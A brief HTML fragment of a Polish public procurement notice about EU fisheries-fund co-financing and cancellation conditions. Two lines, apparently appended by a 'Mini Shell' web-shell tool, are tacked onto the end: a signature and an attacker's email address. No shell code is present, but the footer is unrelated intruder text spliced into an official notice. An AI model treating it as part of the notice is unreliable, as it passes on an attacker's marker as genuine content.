<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany w ramach Środka 4.1 Rozwój obszarów zależnych od rybactwa, objętego osią priorytetową 4 - Zrównoważony rozwój obszarów zależnych od rybactwa, zawartą w Programie Operacyjnym Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013 Europejskiego Funduszu Rybackiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com